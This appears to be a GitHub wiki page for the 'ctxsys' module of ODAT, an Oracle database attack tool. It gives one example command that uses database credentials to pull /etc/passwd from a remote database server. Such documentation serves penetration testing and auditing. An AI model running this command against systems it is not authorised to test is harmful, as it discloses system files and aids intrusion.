-
Notifications
You must be signed in to change notification settings - Fork 345
ctxsys
quentinhardy edited this page Mar 24, 2016
·
2 revisions
This module can be used to download a file stored on the database server:
- To get the /etc/passwd file of the remote database server:
./odat.py ctxsys -s $SERVER -d $SID -U $USER -P $PASSWORD --getFile /etc/passwd
Quentin HARDY: quentin.hardy@bt.com or qhardyfr@gmail.com